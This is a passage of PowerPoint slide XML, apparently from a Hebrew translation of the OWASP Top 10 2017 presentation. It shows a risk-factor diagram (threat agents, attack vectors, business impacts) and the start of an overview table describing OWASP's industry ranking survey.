          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="586848" y="1072154"/>
              <a:ext cx="139703" cy="304798"/>
              <a:chOff x="324" y="1497"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Oval 64"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="372" y="1497"/>
                <a:ext cx="192" cy="192"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Line 65"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="468" y="1689"/>
                <a:ext cx="0" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Line 66"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="324" y="1929"/>
                <a:ext cx="144" cy="192"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52" name="Line 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="468" y="1929"/>
                <a:ext cx="144" cy="192"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Line 68"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="324" y="1785"/>
                <a:ext cx="288" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1309048" y="1078960"/>
              <a:ext cx="838200" cy="357187"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20889"/>
                <a:gd name="adj2" fmla="val 24667"/>
                <a:gd name="adj3" fmla="val 34667"/>
                <a:gd name="adj4" fmla="val 80130"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>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rtl="1" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>נתיבי </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t/>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>תקיפה</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5411940" y="1049627"/>
              <a:ext cx="623454" cy="428655"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="dk1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="18000" rIns="18000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>השפעות</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="43" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="829115" y="1262418"/>
              <a:ext cx="441766" cy="1232"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="45" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="39" idx="3"/>
              <a:endCxn id="42" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4012288" y="1263955"/>
              <a:ext cx="1399652" cy="422"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="430949" y="1348251"/>
              <a:ext cx="572938" cy="335164"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="36000" rIns="36000">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>גורמי איום</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="44" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="39" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2188570" y="1263652"/>
              <a:ext cx="803350" cy="725"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="AutoShape 117"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3457584" y="2283884"/>
            <a:ext cx="192106" cy="340902"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 47538"/>
              <a:gd name="adj2" fmla="val 51293"/>
              <a:gd name="adj3" fmla="val 57006"/>
              <a:gd name="adj4" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="2627763"/>
            <a:ext cx="718782" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>עסקית</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Textplatzhalter 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>+RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    מידע אודות גורמי סיכון</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3B246788-8483-43FD-BCB2-20B1833ED144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1496035176"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="987552"/>
          <a:ext cx="6858000" cy="8159611"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="333869">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>סקירה כללית</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="552028">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בפסגה של פרוייקט </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, משתתפים פעילים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> וחברי הקהילה מחליטים לגבי אופן הצגת הפגיעויות, עם עד לשני סוגי פגיעויות, עם דירוג המוגדר בחלקו באמצעות מידע כמותי ובחלקו באמצעות מידע איכותי מסקרים.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="334404">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he-IL" sz="1600" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>סקר</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> דירוג תעשייתי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3310670">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>לטובת הסקר, אספנו את קטגוריות הפגיעויות אשר זוהו בעבר "ע</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ל הסף" או הוזכרו במשוב למהדורת </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2017 RC1</a:t>
                      </a:r>
                      <a:r>
